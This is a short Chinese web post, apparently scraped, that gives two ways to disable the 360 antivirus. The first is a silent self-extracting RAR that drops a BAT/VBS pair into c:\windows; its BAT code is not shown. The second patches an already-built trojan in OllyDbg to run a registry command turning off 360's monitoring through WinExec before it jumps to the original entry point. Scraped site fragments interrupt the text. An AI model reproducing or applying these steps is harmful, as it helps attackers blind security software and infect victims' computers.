两种方法:
(一) BAT+VBS+RAR
BAT代码如下:
(代码一贴上来,居然被网站监控为不安全信息,不让发布,晕4)
然后用WINRAR建立自解压文件
路径:c:\windows
解压后运行:vbs文件名.vbs
安静模式:全部隐藏
覆盖方式:覆盖所有文件
做完即可,
干掉360的两种方法
,电脑资料
《干掉360的两种方法》(http://meiwen.anslib.com)。(二) ASM汇编
这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。
再找一个小空段,记下地址,假设为40116A
写入:
Push 401180 (也就是那个改动的地址)
Call WinExec
Jmp 原程序入口点(在OD右边)